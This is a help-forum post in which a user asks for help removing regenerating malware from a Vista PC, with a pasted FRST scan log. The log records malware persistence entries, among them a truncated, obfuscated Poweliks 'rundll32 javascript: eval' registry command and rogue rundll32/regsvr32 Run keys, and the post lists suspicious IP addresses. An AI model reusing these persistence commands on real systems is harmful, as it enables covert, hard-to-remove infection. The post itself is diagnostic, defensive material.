Regenerating Bug

jjoyner1985 · August 23, 2014

Good afternoon,

I have an infection on a friend's PC running Vista Home Premium 32-bit SP2 that is driving me to drink. I have tried to remove it myself using various tools but any progress I make is undone within minutes by this malware. So far, Combofix has listed a ZeroAccess rootkit that it has removed. MBAM has shown and allegedly removed 2 trojans. The first was a dropper.ed and agent.ed. The second one I don't remember the name of exactly. It was something along the lines of Milsap or some such. Chrome-like browser windows appear on their own with an IP address as the URL (one of which is from Scranton, PA I found out). The IPs cycle through in this order: 206.51.231.110, 66.197.157.20, 184.173.181.55 and operate under a process known as browser.exe. Each Chrome-like window stays up for a few seconds until the "unresponsive page" warning appears and the browser closes. It is followed by another soon after. Chrome itself is not installed on this computer. I followed the browser.exe process to the following directory: LocalLow/UIMobile/ValidatorVisual. Deleting either ValidatorVisual or UIMobile directories only fixes the issue until it regenerates. Upon deleting the UIMobile directory, the first file to return is titled JawaVinyl.pac, has a size of ~44,762KB, and is (given the extension) a proxy auto configuration file. On the various scans that I've run, some have pointed out that the computer is configured to use a proxy of the 127.0.0.1 port 5555. Looking at the connection settings under Internet Options, the computer is not configured to automatically detect nor use a hard-coded proxy.

Per the sticky, here are the FRST.txt and Addition.txt logs. I have been working on this at work. So, any references to the proxy address of 192.168.0.101:3128 are legit, as that is my empoyer's CentOS web proxy. Thanks in advance for your help.

FRST.txt

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014

Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 23-08-2014 16:54:35

Running from F:\

Platform: Microsoft® Windows Vista™ Home Premium Service Pack 2 (X86) OS Language: English (United States)

Internet Explorer Version 9

Boot Mode: Normal

The only official download link for FRST:

Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/

Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/

Download link from any site other than Bleeping Computer is unpermitted or outdated.

See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe

(Microsoft Corporation) C:\Windows\System32\SLsvc.exe

(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe

(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe

(Microsoft Corporation) C:\Windows\System32\wlanext.exe

(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe

(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe

(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgwdsvc.exe

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE

( ) C:\Windows\System32\lxblcoms.exe

() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe

(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe

() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe

(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE

(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe

(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe

(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe

(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe

(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgtray.exe

(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe

(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe

(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe

(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe

(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe

(Microsoft Corporation) C:\Windows\ehome\ehtray.exe

(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe

(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe

(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe

(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe

(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe

(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe

() C:\Program Files\NETGEAR\WNA1100\WNA1100.exe

(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe

(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe

(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe

(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe

(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe

(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe

(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe

(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe

(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe

(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe

(Microsoft Corporation) C:\Windows\System32\taskmgr.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [ECenter] => C:\Dell\E-Center\EULALauncher.exe [17920 2008-02-29] ( )

HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [4706304 2008-03-06] (Realtek Semiconductor)

HKLM\...\Run: [startCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [90112 2006-11-10] ()

HKLM\...\Run: [dscactivate] => C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe [16384 2008-03-11] ( )

HKLM\...\Run: [PCMService] => C:\Program Files\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)

HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [59240 2012-02-23] (Apple Inc.)

HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)

HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [599328 2010-03-24] (Sony Corporation)

HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [997920 2011-06-15] (Microsoft Corporation)

HKLM\...\Run: [AVG_TRAY] => C:\Program Files\AVG\AVG10\avgtray.exe [2338656 2011-09-10] (AVG Technologies CZ, s.r.o.)

HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)

HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [153640 2009-06-03] (ActivIdentity)

HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [400936 2009-06-03] (ActivIdentity)

HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)

HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)

HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [379752 2012-11-02] (SolarWinds)

HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION

HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION

HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION

HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION

HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION

HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION

HKLM Group Policy restriction on software: C:\Program Files\Malwarebytes' Anti-Malware <====== ATTENTION

HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVAST Software <====== ATTENTION

HKLM\...\Policies\Explorer: [useDefaultTile] 0

HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)

HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [Akamai NetSession Interface] => C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)

HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [iCloudServices] => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-10-31] (Apple Inc.)

HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [com.apple.dav.bookmarks.daemon] => C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe [59720 2013-10-02] (Apple Inc.)

HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ApplePhotoStreams] => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-10-31] (Apple Inc.)

HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [irfuqApivh] => regsvr32.exe "C:\ProgramData\IrfuqApivh\IrfuqApivh.dat"

HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-08-17] (Glarysoft Ltd)

HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [uINoteworthy] => C:\Windows\system32\rundll32.exe "C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll",DllRegisterServer <===== ATTENTION

HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [spybot-S&D Cleaning] => C:\Windows\dwrcs\Uploads\SpybotPortable\App\Spybot\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)

HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Policies\Explorer: [HideSCAHealth] 1

HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: F - F:\LaunchU3.exe -a

HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: {0ae3004a-a5e2-11df-a1d1-00219b005b31} - H:\LaunchU3.exe -a

HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: {a906d2bc-6084-11e3-9d8a-00219b005b31} - H:\LaunchU3.exe -a

HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!

HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)

HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\system: [DisableChangePassword] 0

HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\system: [DisableLockWorkstation] 0

HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\Explorer: [NoLogOff] 0

HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\Explorer: [HideSCAHealth] 1

HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\MountPoints2: F - F:\LaunchU3.exe -a

HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\MountPoints2: {0ae3004a-a5e2-11df-a1d1-00219b005b31} - H:\LaunchU3.exe -a

HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\Run: [swg] => "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"

HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)

HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\RunOnce: [spchecker] => C:\Program Files\AVG\AVG10\Notification\SPCheckerTE.exe [390472 2011-12-22] ()

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ActivClient Agent.lnk

ShortcutTarget: ActivClient Agent.lnk -> C:\Program Files\ActivIdentity\ActivClient\acsagent.exe (ActivIdentity)

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk

ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk

ShortcutTarget: Metacafe.lnk -> C:\$RECYCLE.BIN\S-1-5-21-3726736968-409882640-1958551794-1000\MetacafeAgent.exe (No File)

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1100 Smart Wizard.lnk

ShortcutTarget: NETGEAR WNA1100 Smart Wizard.lnk -> C:\Program Files\NETGEAR\WNA1100\WNA1100.exe ()

Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk

ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)

Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk

ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)

Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk

ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)

Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk

ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)

Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk

ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)

Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk

ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)

Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk

ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)

Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk

ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)

BootExecute: autocheck autochk * BootDefrag.exesasnative32

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xA02BBBD1D537CF01

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us

URLSearchHook: HKCU - (No Name) - {26842a09-ffa8-4e2c-ae12-0c80f01c3295} - No File

SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}

SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}

BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)

BHO: SSVHelper Class -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (Sun Microsystems, Inc.)

BHO: CBrowserHelperObject Object -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> C:\Program Files\Dell\BAE\BAE.dll (Dell Inc.)

BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)

Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File

DPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.winkflash.com/photo/loaders/ImageUploader5.cab

DPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab

DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab

Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll (AVG Technologies CZ, s.r.o.)

Winsock: Catalog5 01 %SystemRoot%\System32\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"

Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 66.18.32.2 66.18.32.3

FireFox:

========

FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()

FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)

FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)

FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension

FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-06]

FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2

FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2010-09-02]

FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG10\Firefox4

FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG10\Firefox4 [2011-07-10]

FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2

Chrome:

=======

CHR HKLM\...\Chrome\Extension: [icmlaeflemplmjndnaapfdbbnpncnbda] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx []

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [207400 2009-06-03] (ActivIdentity)

S3 AVG Security Toolbar Service; C:\Program Files\AVG\AVG10\Toolbar\ToolbarBroker.exe [167264 2011-11-10] ()

R2 avgfws; C:\Program Files\AVG\AVG10\avgfws.exe [2708024 2011-03-09] (AVG Technologies CZ, s.r.o.)

S2 AVGIDSAgent; C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe [7390560 2011-08-18] (AVG Technologies CZ, s.r.o.)

R2 avgwd; C:\Program Files\AVG\AVG10\avgwdsvc.exe [269520 2011-02-08] (AVG Technologies CZ, s.r.o.)

R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [161048 2008-04-28] (Stardock Corporation)

R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [705384 2012-11-02] (SolarWinds)

R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2008-10-16] (Hewlett-Packard Co.) [File not signed]

R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]

R2 HPSLPSVC; C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL [634880 2008-10-16] (Hewlett-Packard Co.) [File not signed]

S3 jswpsapi; C:\Program Files\NETGEAR\WNA1100\jswpsapi.exe [960992 2010-03-22] (Atheros Communications, Inc.)

R2 lxbl_device; C:\Windows\system32\lxblcoms.exe [537520 2007-04-20] ( )

R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2008-07-18] (Hewlett-Packard) [File not signed]

S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)

R2 PassThru Service; C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [87040 2012-03-23] () [File not signed]

R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2008-07-18] (Hewlett-Packard) [File not signed]

R2 WSWNA1100; C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe [266240 2010-08-04] () [File not signed]

S2 vToolbarUpdater; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\9.0.1\ToolbarUpdater.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 athur; C:\Windows\System32\DRIVERS\athur.sys [1439744 2010-10-10] (Atheros Communications, Inc.)

R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)

R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [248656 2011-01-07] (AVG Technologies CZ, s.r.o.)

R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [34896 2011-03-01] (AVG Technologies CZ, s.r.o.)

R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [32592 2011-03-16] (AVG Technologies CZ, s.r.o.)

R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [297168 2011-04-05] (AVG Technologies CZ, s.r.o.)

R0 BootDefragDriver; C:\Windows\System32\drivers\BootDefragDriver.sys [16064 2014-07-18] (Glarysoft Ltd)

S3 gfiark; C:\Windows\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)

R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17216 2014-08-14] (Glarysoft Ltd)

R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [110296 2014-08-23] (Malwarebytes Corporation)

R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)

S3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)

R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-03-06] (Windows ® Codename Longhorn DDK provider)

R0 SCMNdisP; C:\Windows\System32\DRIVERS\scmndisp.sys [21728 2007-01-19] (Windows ® Codename Longhorn DDK provider)

S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [42496 2011-08-02] (Apple, Inc.) [File not signed]

U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)

S1 AVGIDSDriver; system32\DRIVERS\avgidsdriverx.sys [X]

S1 AVGIDSShim; system32\DRIVERS\avgidsshimx.sys [X]

S3 catchme; \??\C:\ComboFix\catchme.sys [X]

S3 IpInIp; system32\DRIVERS\ipinip.sys [X]

S1 MpKslb9ee2848; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{BFB5F758-88DD-40A2-8570-9299F94880E8}\MpKslb9ee2848.sys [X]

S1 MpKslbb89cfa8; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A306A4ED-0116-4B29-AE29-DC65EC41A044}\MpKslbb89cfa8.sys [X]

S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]

S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

S3 SWDUMon; system32\DRIVERS\SWDUMon.sys [X]

S3 TfNetMon; \??\C:\Windows\system32\drivers\TfNetMon.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-23 16:54 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST

2014-08-23 16:30 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys

2014-08-23 16:30 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk

2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware

2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware

2014-08-23 16:30 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys

2014-08-23 16:30 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys

2014-08-23 16:30 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys

2014-08-23 16:16 - 2014-08-23 16:16 - 00009460 _____ () C:\ComboFix.txt

2014-08-23 12:25 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe

2014-08-23 12:25 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe

2014-08-23 12:25 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe

2014-08-23 12:25 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe

2014-08-23 12:25 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe

2014-08-23 12:25 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe

2014-08-23 12:25 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe

2014-08-23 12:25 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe

2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt

2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt

2014-08-23 11:51 - 2014-08-23 11:53 - 00000000 ____D () C:\AdwCleaner

2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt

2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT

2014-08-23 11:23 - 2014-08-23 11:25 - 00001106 _____ () C:\Users\savas.kyriakidis\Desktop\Live PC Help.lnk

2014-08-23 11:02 - 2014-08-23 11:05 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy

2014-08-22 17:06 - 2013-09-04 14:57 - 00024040 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys

2014-08-22 17:06 - 2013-05-23 08:39 - 00043368 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys

2014-08-22 17:05 - 2014-08-22 21:40 - 00000000 ____D () C:\VIPRERESCUE

2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK

